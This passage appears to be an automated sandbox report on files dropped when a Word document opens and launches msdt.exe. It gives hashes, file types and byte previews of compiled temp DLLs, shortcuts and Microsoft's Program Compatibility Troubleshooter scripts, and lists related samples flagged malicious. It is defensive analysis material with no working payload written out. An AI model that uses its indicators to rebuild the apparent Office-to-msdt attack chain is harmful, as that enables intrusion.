Preview:L.....b.............debug$S........t...................@..B.rsrc$01........X.......X...........@..@.rsrc$02........P...b...............@..@........U....c:\Users\user\AppData\Local\Temp\xwo13jpt\CSC9D13466D68BE46EAAB5DAAD8B4EDFE4C.TMP...................9.kl`...................5.......C:\Users\user\AppData\Local\Temp\RES4C97.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.w.o.1.3.j.p.t...d.l.l.....(.....L.e.g.a.l.C.

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols
Category:dropped
Size (bytes):1368
Entropy (8bit):4.068529171891967
Encrypted:false
SSDEEP:24:Hzi3W9oPV5RHRhKdofeI+ycuZhNIakS0PNnq9Yld:w/d5R/Kum1ulIa3Uq9YP
MD5:7F5D98DD1616DAAE5FDB4B3B64239B5C
SHA1:02C3617D9FA457D86A4217B5E2416C37ED41EAF5
SHA-256:F039719B65593874A1C215DA4D0A258EA002B82F3C2505F9207200008107482D
SHA-512:0E6B0E7CDDDCEEF93AD0490AB60350611B5E193495B1C0A5D670C88A2B346B6ECC75755D438E7CB954F03FE5F75542BF056CE87032BB8272F68A87B884AC9DBA
Malicious:false
Preview:L.../.b.............debug$S........t...................@..B.rsrc$01........X.......X...........@..@.rsrc$02........P...b...............@..@........U....c:\Users\user\AppData\Local\Temp\ddzr0cba\CSC44E4BCADDF3245FBA3B96135AF703040.TMP..................$t..B...3L(..#-...........5.......C:\Users\user\AppData\Local\Temp\RESB3CD.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.d.z.r.0.c.b.a...d.l.l.....(.....L.e.g.a.l.C.
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                            Entropy (8bit):3.0841041192668177
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryGak7Ynqq0PN5Dlq5J:+RI+ycuZhNIakS0PNnqX
                                                                                                                                                                            MD5:2474FFB442AB88F7334C28AC94232DEA
                                                                                                                                                                            SHA1:29AFF176603EF2403223790DAEADD51F5C6A2D39
                                                                                                                                                                            SHA-256:2AB2047A7A0AEB12410062F5671938A0B649CB2337F1D7B460494DBFA0547E15
                                                                                                                                                                            SHA-512:4B3318A70ED2E6549FDA5E4EB394235A672CAC8AFF5C77062585F099562DAB9F3C92AD860A53F6DB41ABB54D9E27D95F1853AF164369ACC2D873DA3188B22CB0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.d.z.r.0.c.b.a...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.d.z.r.0.c.b.a...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):9728
                                                                                                                                                                            Entropy (8bit):4.794249848380279
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:/KqedmYoNKvUTCSH3gR8H8FgwSHwBhkwZYPaSJ365OkieMjQZaKRnIj2K:CElNK8TCSfHyPhkwZ+vKOTQZjnG
                                                                                                                                                                            MD5:6EE340A48A9C20B04134413E2268DEBB
                                                                                                                                                                            SHA1:7BC0B902D3D681BD297648D75B8F0CD99AEAC79E
                                                                                                                                                                            SHA-256:6AA73DCC1D35D9CAEA2860D83BF96CFAE393A7D532A17AA984841F29A149BE87
                                                                                                                                                                            SHA-512:8EC9551012B64375E2E932E6776F281F9D8D8BFC0C2848994F44906AAA864FD159D2A1996E3CFC6E36D7120052013A760D2C8879D0819EBCB75C388DF82747BC
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!................^<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B................@<......H........$..4............................................................0..%....... ....s.....r...p.(....,..o....*~....*....0..!....... ....s.......(....,..o....*~....*....0...........(....s......o.........o....*....0..@....... ....s..... ....s........(....s.......o....o....&..o....o....&.*.0...........,.. .+.....o.....+).o......t....~....(....,...t.......(....&.o....-....u........,...o......o......+*..o......t....~....(....,...t.......(....&..o....-.....u........,...o.....*
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                            Entropy (8bit):3.1133460136408515
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryavak7YnqqHIPN5Dlq5J:+RI+ycuZhNsvakSHIPNnqX
                                                                                                                                                                            MD5:FDB2ACD68AA940F09F3CD89842A03A4C
                                                                                                                                                                            SHA1:5A068F249C632673E9743DE0119B3D5FD3EB5968
                                                                                                                                                                            SHA-256:C0AE37245612C506864EFEA4661F111B941699E49702EA0A8CF2CA30CA7A2996
                                                                                                                                                                            SHA-512:18F32180C319BA0280B15B36BE7EC8A9326BD9572CDDE223A9D7A01DA48074B672C25E250B6AFF90FD8899950A221D46F5E06F4956EE564392065BECDF0CCC2B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.e.5.j.z.p.d.a...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...q.e.5.j.z.p.d.a...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5120
                                                                                                                                                                            Entropy (8bit):3.7842633410808206
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:6WoPhmKraYZkH8KTibUyWkwjj0JwUC+CFSlwYgc1ul8a3Qq:MDaAkHHoQk89GCuQaK
                                                                                                                                                                            MD5:1A1C9639F1DF5ED946762D32605AF368
                                                                                                                                                                            SHA1:C2A5DEC29F78351F6AEA23CBDC071A7EE7F2E24C
                                                                                                                                                                            SHA-256:E73033B25389F7D790541E99D20FB367ACCDCA8C33C5F72F99FB6386A8ED4C3D
                                                                                                                                                                            SHA-512:EFD25EEB2F3D451EF79F6CDF3ADE12EF2AD00061577DF3B0C95C4CE4AF8FD3EF9387436122540E84AC500751C56A8BEE2DF62DB522A382823A0FDC2CDAD4C060
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!................>*... ...@....... ....................................@..................................)..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ *......H....... ".............................................................."..(....*J.#(....r...p(....*..(....*2~.....(....*....0.......... ....s..... ....s...............r;..p.........(......s.............5.....".....5.....3+E...../...(.-...2.3+1...:3...+)....3...+....+...+...+...+...,...+...+......r;..p...o................ ...o.........+Y.......r=..p..o......1.r=..p..o..........+(r...p..o...........(........r...p(.........X.......i2..........(.........o........o....-.r...p....
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                            Entropy (8bit):3.123708616746124
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryFMak7YnqqmBPN5Dlq5J:+RI+ycuZhNEakSQPNnqX
                                                                                                                                                                            MD5:CC39D26B6C6008021BA8F3A7F51996B8
                                                                                                                                                                            SHA1:FF2BDE04559FA719536987EF732A12F7DD47FAC5
                                                                                                                                                                            SHA-256:AAE7C90A36B51CB6F30CFA6B97BAD94D507DBAB537BE0AEBC6335FDE5B5FB1AA
                                                                                                                                                                            SHA-512:71279E11194AF84A649A30B5993D3258F98F465433375D4DEC85470133F46997F0D202D39637001DF4C8CDD38776BE02AA958191E8A58213931E9A672378222D
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.w.o.1.3.j.p.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.w.o.1.3.j.p.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):3584
                                                                                                                                                                            Entropy (8bit):3.087676930087491
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:etGS49pz1qlkCe745Q7GslPorqjvX5ekjV4gztkZf4dy6Iv+hOBWI+ycuZhNEakA:6Mpqb927GslPlDRjyJ4dSk1ulEa3Iq
                                                                                                                                                                            MD5:121397484E96CF4E2E4F8A2C7B45EC73
                                                                                                                                                                            SHA1:15E9436EF6ABFC88CF8BC76D414B8F5876D113E0
                                                                                                                                                                            SHA-256:02E7755A19BD7D93776CCB15CCFE37699417D01E9A42FBE10C8109FE1BABACD9
                                                                                                                                                                            SHA-512:B5512381DED39698030AA5C69F5803928EAB8914C882B3E717329BC0F537E4FC04B7027FD99E24E09D1BCB005C41B973B85E6E13B22A8A1F632B05513BCA99A6
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....*~....*F.r...pr...po....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:29:00 2022, mtime=Tue Jun 7 23:40:06 2022, atime=Tue Jun 7 23:39:52 2022, length=10142, window=hide
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1050
                                                                                                                                                                            Entropy (8bit):4.697187741955964
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:8eygag39gNEmDB6sW8AjK6+mDy+939K7aB6m:8eyd49veW7jKLU939LB6
                                                                                                                                                                            MD5:D496A09DA9D6082EC540DA5331C394DE
                                                                                                                                                                            SHA1:3D201847125BF5C626D6E453767F8E2986F395F8
                                                                                                                                                                            SHA-256:9B079D289EE729F65BC3C2C7920F6FA8E087EBAF10D0F04B9C907D065F213704
                                                                                                                                                                            SHA-512:605F0EFCC085F5B0513A464904632260644FF4838597FFF163C6556AC91E2E4BC6D28553FF83A8B205421524B7B5DACE060CF2C3881D7B78D3716E87B6FE27B9
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:L..................F.... ........3..x.\L.z.....D.z...'...........................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...T......................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....hT....user..>.......NM..T.......S........................a.l.f.o.n.s.....~.1.....hT....Desktop.h.......NM..T.......Y..............>........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..'...T.. .DOC171~1.DOC..J......hT...T................................d.o.c.1.7.1.2...d.o.c.x.......S...............-.......R...........>.S......C:\Users\user\Desktop\doc1712.docx..#.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.1.7.1.2...d.o.c.x.........:..,.LB.)...Aw...`.......X.......642294...........!a..%.H.VZAj......s.........W...!a..%.H.VZAj......s.........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..p
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                            Entropy (8bit):4.597075278863427
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:bDuMJlZVUNzCmxWKVUNzCv:bCSVUDUy
                                                                                                                                                                            MD5:2E496A3F1C20211051285A980DADA39A
                                                                                                                                                                            SHA1:B980277016A7BCCC0E108CD9A00E82AF61433394
                                                                                                                                                                            SHA-256:B466FF5520F73BD086D77160EB4D437F0AA73747604E1318E3BF3C220D218763
                                                                                                                                                                            SHA-512:3104FE77ABF38AC191DC43C0BC437017B1A07804238503A6F8D2A3762F48E96E687BF0EB98FEF36E9FFC3451820E6D54BB00AE01B789779CDD10AAE61302E547
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[folders]..Templates.LNK=0..doc1712.LNK=0..[misc]..doc1712.LNK=0..
Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):1.8075487029643305
Encrypted:false
SSDEEP:3:Rl/ZdRI1//Il8QrlGalRhlXln:RtZM282lZP
MD5:F8B1A6B462404EC70AB8DC7593348BC3
SHA1:202E676B35E0CBE22B837B698E7ADDB8AD84CC7C
SHA-256:80E3252D8EB31F7D1428825C208817CFCA9A8CC873902E783BE2E7E9D6FCA718
SHA-512:95C8317D137E7545E010E1F231DFE6665F73471F36DE25935DBAC3EE88A5F9C8C97495D18F8C221161478CD8498D6CB7EA024F9EF7DE46C56184AA6C8B8B5F6F
Malicious:false
Preview:.pratesh................................................p.r.a.t.e.s.h.........j.Z.=..................................................|.u..t......................
Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:Little-endian UTF-16 Unicode text, with CR line terminators
Category:dropped
Size (bytes):20
Entropy (8bit):2.8954618442383215
Encrypted:false
SSDEEP:3:QVNliGn:Q9rn
MD5:C4F79900719F08A6F11287E3C7991493
SHA1:754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
SHA-256:625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
SHA-512:0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
Malicious:false
Preview:..p.r.a.t.e.s.h.....
Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):1.8075487029643305
Encrypted:false
SSDEEP:3:Rl/ZdRI1//Il8QrlGalRhlXln:RtZM282lZP
MD5:F8B1A6B462404EC70AB8DC7593348BC3
SHA1:202E676B35E0CBE22B837B698E7ADDB8AD84CC7C
SHA-256:80E3252D8EB31F7D1428825C208817CFCA9A8CC873902E783BE2E7E9D6FCA718
SHA-512:95C8317D137E7545E010E1F231DFE6665F73471F36DE25935DBAC3EE88A5F9C8C97495D18F8C221161478CD8498D6CB7EA024F9EF7DE46C56184AA6C8B8B5F6F
Malicious:false
Preview:.pratesh................................................p.r.a.t.e.s.h.........j.Z.=..................................................|.u..t......................
Process:C:\Windows\SysWOW64\msdt.exe
File Type:HTML document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):24702
Entropy (8bit):4.37978533849437
Encrypted:false
SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
MD5:191959B4C3F91BE170B30BF5D1BC2965
SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
Malicious:false
Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..
Process:C:\Windows\SysWOW64\msdt.exe
File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:dropped
Size (bytes):66560
Entropy (8bit):6.926109943059805
Encrypted:false
SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
MD5:6E492FFAD7267DC380363269072DC63F
SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: R346ltaP9w.rtf, Detection: malicious
• Filename: VIP Invitation to Doha Expo 2023.docx, Detection: malicious
• Filename: WykHEO9BQN.rtf, Detection: malicious
• Filename: lol666 (2).bat, Detection: malicious
• Filename: EISPv0c56U.doc, Detection: malicious
• Filename: mjpoc_slide.doc, Detection: malicious
• Filename: mjpoc_slide.doc, Detection: malicious
• Filename: 05-2022-0438.doc, Detection: malicious
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\SysWOW64\msdt.exe
File Type:ISO-8859 text, with CRLF line terminators
Category:dropped
Size (bytes):50242
Entropy (8bit):4.932919499511673
Encrypted:false
SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
MD5:EDF1259CD24332F49B86454BA6F01EAB
SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
Malicious:false
Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp
Process:C:\Windows\SysWOW64\msdt.exe
File Type:UTF-8 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):16946
Entropy (8bit):4.860026903688885
Encrypted:false
SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
MD5:2C245DE268793272C235165679BF2A22
SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
Malicious:false
Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ
Process:C:\Windows\SysWOW64\msdt.exe
File Type:ISO-8859 text, with CRLF line terminators
Category:dropped
Size (bytes):453
Entropy (8bit):4.983419443697541
Encrypted:false
SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
MD5:60A20CE28D05E3F9703899DF58F17C07
SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
Malicious:false
Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:dropped
Size (bytes):6650
Entropy (8bit):3.6751460885012333
Encrypted:false
SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
MD5:E877AD0545EB0ABA64ED80B576BB67F6
SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
Malicious:false
Preview (UTF-16 text, decoded; truncated where the report truncates it):
# Localized    04/11/2018 02:05 PM (GMT)    303:4.80.0411     CL_LocalizationData.psd1
# Localized    01/04/2013 11:32 AM (GMT)    303:4.80.0411     CL_LocalizationData.psd1
ConvertFrom-StringData @'
###PSLOC
Program_Choice_NOTLISTED=Not Listed
Version_Choice_DEFAULT=None
Version_Choice_WIN8RTM=Windows 8
Version_Choice_WIN7RTM=Windows 7
Version_Choice_WINVISTA2=Windows Vista (Service Pack 2)
Version_Choice_WINXPSP3=Windows XP (Service Pack 3)
Version_Choice_MSIAUTO=Skip Version Check
Version_Choice_UN
Process:C:\Windows\SysWOW64\msdt.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):10752
Entropy (8bit):3.517898352371806
Encrypted:false
SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
MD5:CC3C335D4BBA3D39E46A555473DBF0B8
SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
